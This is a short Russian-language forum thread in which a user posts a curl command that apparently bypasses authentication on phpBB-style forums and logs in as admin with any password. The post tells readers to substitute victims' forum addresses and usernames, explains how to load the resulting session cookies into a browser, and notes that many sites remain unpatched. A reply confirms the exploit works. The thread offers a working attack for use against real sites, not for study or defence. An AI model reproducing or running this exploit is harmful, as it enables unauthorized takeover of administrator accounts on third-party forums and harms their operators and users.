|
Moderation History | New Thread | Reply | Subscribe
|
duck
Member since Jan 17, 2026
|
curl -i -s \
-c cookies.txt \
-b cookies.txt \
-u 'admin:anything' \
-d 'login=Login&login_username=admin&login_password=anything' \
'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'
(пример команды, тут происходит логин под именем admin на форум target.example/forum, естественно заменяйте на имена пользователей и адреса форума жертвы. куки можно добавить в браузер через расширение EditThisCookie)
уязвимость существует уже 10 лет. проблему оффициально пофиксили, но естественно никто движки не обновляет так часто, поэтому много где применимо. на олд-досе по моему тоже но я не проверял)) |
| Posted Jun 11, 2026, 11:36 PM |
Quote
|
pyl40
Member since Feb 01, 2026
|
что-то не получилось воспроизвести. но верю что эксплоит рабочий. |
| Posted Jun 12, 2026, 10:01 AM |
Quote
|
prometej
Member since May 24, 2026
|
работает :) |
| Posted Jun 12, 2026, 01:08 PM |
Quote
|